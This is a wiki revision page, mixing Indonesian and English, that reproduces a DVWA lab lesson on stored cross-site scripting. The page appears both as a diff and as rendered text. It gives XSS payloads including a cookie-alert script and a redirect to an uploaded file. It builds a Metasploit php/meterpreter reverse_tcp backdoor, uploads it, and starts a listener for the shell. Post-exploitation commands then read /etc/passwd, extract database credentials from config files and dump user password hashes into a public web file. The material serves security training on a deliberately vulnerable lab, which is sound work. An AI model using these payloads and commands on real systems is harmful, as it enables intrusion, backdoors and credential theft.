Difference between revisions of "DVWA: XSS"
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
Line 70: | Line 70: | ||
This is a powerful exploit because a user could use SET to create Malicious cloned website and place in here. | This is a powerful exploit because a user could use SET to create Malicious cloned website and place in here. | ||
e.g., Social Engineering Toolkit (SET): Lesson 3: Create Malicious Weblink, Install Virus, Capture Forensic Images | e.g., Social Engineering Toolkit (SET): Lesson 3: Create Malicious Weblink, Install Virus, Capture Forensic Images | ||
+ | |||
+ | ==XSS Stored COOKIE Exploit Test== | ||
+ | |||
+ | * Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi. | ||
+ | * Klik > XSS (Stored) | ||
+ | * Pada Nama isi "Test 3" | ||
+ | * Pada Message isi "<script>alert(document.cookie)</script>" | ||
+ | * Klik > Sign Guestbook | ||
+ | |||
+ | |||
+ | Below is the cookie/session that the webserver establishes with the current browser session. | ||
+ | An attacker could easily modify this XSS script to send the cookie to a remote location instead of displaying it. | ||
+ | Image if this was a bank website. Every time a user logs in their cookie information could be sent to a remote location. | ||
+ | |||
+ | |||
+ | ==Build PHP msfpayload== | ||
+ | |||
+ | |||
+ | mkdir -p /root/backdoor | ||
+ | cd /root/backdoor | ||
+ | msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 R > FORUM_BUG.php | ||
+ | ls -l FORUM_BUG.php | ||
+ | |||
+ | |||
+ | Select "Upload" from the left navigation menu. | ||
+ | Click Browse | ||
+ | |||
+ | Start msfconsole | ||
+ | |||
+ | |||
+ | msfconsole | ||
+ | |||
+ | use exploit/multi/handler | ||
+ | set PAYLOAD php/meterpreter/reverse_tcp | ||
+ | set LHOST 192.168.1.105 | ||
+ | set LPORT 4444 | ||
+ | exploit | ||
+ | |||
+ | |||
+ | ==XSS Stored window.location Exploit Test== | ||
+ | |||
+ | * Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi. | ||
+ | * Klik > XSS (Stored) | ||
+ | Name: Test 4 | ||
+ | Message: | ||
+ | |||
+ | <script>window.location="http://192.168.1.106/dvwa/hackable/uploads/FORUM_BUG.php" </script> | ||
+ | Replace 192.168.1.106 with the IP Address obtain from Fedora 14 in (Section 3, Step 3). | ||
+ | |||
+ | Click Sign Guestbook | ||
+ | Click OK when the Test 1 Message is displayed | ||
+ | |||
+ | shell | ||
+ | |||
+ | Establishes a "sh" shell. | ||
+ | |||
+ | tail /etc/passwd | ||
+ | |||
+ | This produces a potential prospect list for a ssh brute force attack | ||
+ | |||
+ | whoami | ||
+ | Displays the name of the user. | ||
+ | grep apache /etc/passwd | ||
+ | The goal of this command is obtaining the home directory for the apache username. | ||
+ | find /var/www/* -print | grep config | ||
+ | Here I am wanting to find all the configuration files in the /var/www directory. | ||
+ | |||
+ | |||
+ | |||
+ | grep "db_" /var/www/html/dvwa/config/config.inc.php | ||
+ | This produces the database name, username, and password information to log into the mysql database. | ||
+ | echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD | ||
+ | This command produces a table list of the dvwa database. | ||
+ | echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD | ||
+ | This command describes the columns of the users table in the dvwa datase. | ||
+ | echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD | ||
+ | This command displays the user and password information for each user in the dvwa.users table. | ||
+ | |||
+ | |||
+ | echo "<pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html | ||
+ | Place the html <pre> tag in the xss.html file. | ||
+ | The <pre> is used as a pre-formatter. | ||
+ | echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD >> /var/www/html/dvwa/hackable/uploads/xss.html | ||
+ | Place user and password for the dvwa.users table in the xss.html file. | ||
+ | echo "</pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html | ||
+ | Place the close html </pre> tag in the xss.html file. | ||
+ | echo "<br>Your Name<br>" >> /var/www/html/dvwa/hackable/uploads/xss.html | ||
+ | Replace the string "Your Name" with your actual name. | ||
+ | date >> /var/www/html/dvwa/hackable/uploads/xss.html | ||
+ | |||
+ | |||
+ | |||
+ | |||
+ | On BackTrack, place the below URI in Firefox | ||
+ | http://192.168.1.106/dvwa/hackable/uploads/xss.html | ||
+ | Replace the above IP address with the IP Address obtained in (Section 3, Step 3). | ||
==Referensi== | ==Referensi== | ||
* http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson9/index.html | * http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson9/index.html |
Revision as of 09:30, 28 May 2017
sumber: http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson9/index.html
Tujuan
- Test a basic cross site scripting (XSS) attack
- Test an iframe cross site scripting (XSS) attack
- Test a cookie cross site scripting (XSS) attack
- Create a php/meterpreter/reverse_tcp payload
- Start the php/meterpreter/reverse_tcp listener
- Upload the PHP payload to the DVWA Upload screen
- Test a PHP Payload cross site scripting (XSS) attack
Di sisi DVWA
Cek IP
ifconfig
Fix Stored Cross Site Scripting (XSS) Comment Box
Edit index.php
cd /var/www/html/DVWA-1.9/vulnerabilities/xss_s/ vi index.php
Search dengan keyword mtxMessage Ubah maxlength=50
<textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"50\"></textarea>
menjadi maxlength=250
<textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"250\"></textarea>
Di sisi Kali Linux
Cek IP Kali Linux
ifconfig -a
Enable Javascript di Browser
Buka Firefox Preferences > Content > Uncheck - Block pop-up windows
Masuk ke DVWA
- Login
- DVWA Security > Low
XSS Stored Basic Exploit Test
- Klik > XSS (Stored)
- Pada Name isi "Test 1"
- Pada Message isi "<script>alert("This is a XSS Exploit Test")</script>"
- Klik > Sign Guestbook
XSS Stored IFRAME Exploit Test
- Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
- Klik > XSS (Stored)
- Pada Nama isi "Test 2"
- Pada Message isi "<iframe src="http://www.cnn.com"></iframe>"
- Klik > Sign Guestbook
Tampak bahwa CNN muncul di bawah "Test 2" .
This is a powerful exploit because a user could use SET to create Malicious cloned website and place in here. e.g., Social Engineering Toolkit (SET): Lesson 3: Create Malicious Weblink, Install Virus, Capture Forensic Images
XSS Stored COOKIE Exploit Test
- Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
- Klik > XSS (Stored)
- Pada Nama isi "Test 3"
- Pada Message isi "<script>alert(document.cookie)</script>"
- Klik > Sign Guestbook
Below is the cookie/session that the webserver establishes with the current browser session. An attacker could easily modify this XSS script to send the cookie to a remote location instead of displaying it. Image if this was a bank website. Every time a user logs in their cookie information could be sent to a remote location.
Build PHP msfpayload
mkdir -p /root/backdoor cd /root/backdoor msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 R > FORUM_BUG.php ls -l FORUM_BUG.php
Select "Upload" from the left navigation menu. Click Browse
Start msfconsole
msfconsole
use exploit/multi/handler set PAYLOAD php/meterpreter/reverse_tcp set LHOST 192.168.1.105 set LPORT 4444 exploit
XSS Stored window.location Exploit Test
- Reset Database DVWA, supaya XSS yang pernah dilakukan tidak muncul lagi.
- Klik > XSS (Stored)
Name: Test 4 Message:
<script>window.location="http://192.168.1.106/dvwa/hackable/uploads/FORUM_BUG.php" </script> Replace 192.168.1.106 with the IP Address obtain from Fedora 14 in (Section 3, Step 3).
Click Sign Guestbook Click OK when the Test 1 Message is displayed
shell
Establishes a "sh" shell.
tail /etc/passwd
This produces a potential prospect list for a ssh brute force attack
whoami Displays the name of the user. grep apache /etc/passwd The goal of this command is obtaining the home directory for the apache username. find /var/www/* -print | grep config Here I am wanting to find all the configuration files in the /var/www directory.
grep "db_" /var/www/html/dvwa/config/config.inc.php This produces the database name, username, and password information to log into the mysql database. echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD This command produces a table list of the dvwa database. echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD This command describes the columns of the users table in the dvwa datase. echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD This command displays the user and password information for each user in the dvwa.users table.
echo "
" >> /var/www/html/dvwa/hackable/uploads/xss.html Place the html <pre> tag in the xss.html file. The <pre> is used as a pre-formatter. echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD >> /var/www/html/dvwa/hackable/uploads/xss.html Place user and password for the dvwa.users table in the xss.html file. echo "
" >> /var/www/html/dvwa/hackable/uploads/xss.html Place the close html tag in the xss.html file.
echo "
Your Name
" >> /var/www/html/dvwa/hackable/uploads/xss.html Replace the string "Your Name" with your actual name. date >> /var/www/html/dvwa/hackable/uploads/xss.html
On BackTrack, place the below URI in Firefox http://192.168.1.106/dvwa/hackable/uploads/xss.html Replace the above IP address with the IP Address obtained in (Section 3, Step 3).